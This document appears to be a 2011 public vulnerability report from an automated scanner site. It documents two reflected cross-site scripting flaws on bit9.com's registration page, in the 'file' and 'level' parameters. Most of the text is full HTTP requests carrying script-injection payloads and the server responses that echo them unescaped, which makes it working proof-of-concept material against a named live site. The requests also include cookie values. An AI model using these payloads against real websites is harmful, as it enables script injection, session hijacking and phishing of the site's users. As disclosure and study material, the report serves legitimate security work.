XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, bit9.com

Report generated by XSS.CX at Wed Oct 05 16:37:40 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

XSS in bit9.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86, BHDB, Javascript Injection, Insecure Programming, Weak Configuration, Browser Hijacking, Phishing

1.1. http://www.bit9.com/resources/register/index.php [file parameter]

1.2. http://www.bit9.com/resources/register/index.php [level parameter]


1. Cross-site scripting (reflected)
There are 2 instances of this issue:

1.1. http://www.bit9.com/resources/register/index.php [file parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bit9.com
Path:   /resources/register/index.php

Issue detail

The value of the file request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2faad"><script>alert(1)</script>df05f93dc21 was submitted in the file parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/register/index.php?sfcid=70180000000cYHl&file=Datasheet_Bit9_Parity_for_Q1Labs.pdf2faad"><script>alert(1)</script>df05f93dc21&level=1 HTTP/1.1
Host: www.bit9.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bit9.com/resources/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=d4968532ae0287db22971ec819b58e68; __utmx=117019797.00013311102359511243:1:0-0-0; __utmxx=117019797.00013311102359511243:1317850380:2592000; __unam=10039862-132d601b22a-553239d1-1; __utma=242263325.195101426.1317850381.1317850381.1317850381.1; __utmb=242263325.5.9.1317850432476; __utmc=242263325; __utmz=242263325.1317850381.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 21:35:06 GMT
Content-Length: 45070

<!DOCTYPE html>

<html lang="en">
<head>

       
       <title>Learn More About Adaptive Application Whitelisting Solutions and Desktop Security</title>
   <meta name="copyright" content=" Bit9, Inc.
...[SNIP]...
<input type="hidden" name="C_Last_Download1" value="Datasheet_Bit9_Parity_for_Q1Labs.pdf2faad"><script>alert(1)</script>df05f93dc21" />
...[SNIP]...
1.2. http://www.bit9.com/resources/register/index.php [level parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bit9.com
Path:   /resources/register/index.php

Issue detail

The value of the level request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81de5"><script>alert(1)</script>6cee332c591 was submitted in the level parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/register/index.php?sfcid=70180000000cYHl&file=Datasheet_Bit9_Parity_for_Q1Labs.pdf&level=181de5"><script>alert(1)</script>6cee332c591 HTTP/1.1
Host: www.bit9.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bit9.com/resources/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=d4968532ae0287db22971ec819b58e68; __utmx=117019797.00013311102359511243:1:0-0-0; __utmxx=117019797.00013311102359511243:1317850380:2592000; __unam=10039862-132d601b22a-553239d1-1; __utma=242263325.195101426.1317850381.1317850381.1317850381.1; __utmb=242263325.5.9.1317850432476; __utmc=242263325; __utmz=242263325.1317850381.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 21:35:08 GMT
Content-Length: 45027

<!DOCTYPE html>

<html lang="en">
<head>

       
       <title>Learn More About Adaptive Application Whitelisting Solutions and Desktop Security</title>
   <meta name="copyright" content=" Bit9, Inc.
...[SNIP]...
<input type="hidden" name="retURL" value="http://www.bit9.com/resources/register/thank-you.php?sfcid=70180000000cYHl&level=181de5"><script>alert(1)</script>6cee332c591&file=Datasheet_Bit9_Parity_for_Q1Labs.pdf&kwd=" />
...[SNIP]...
Report generated by XSS.CX at Wed Oct 05 16:37:40 CDT 2011.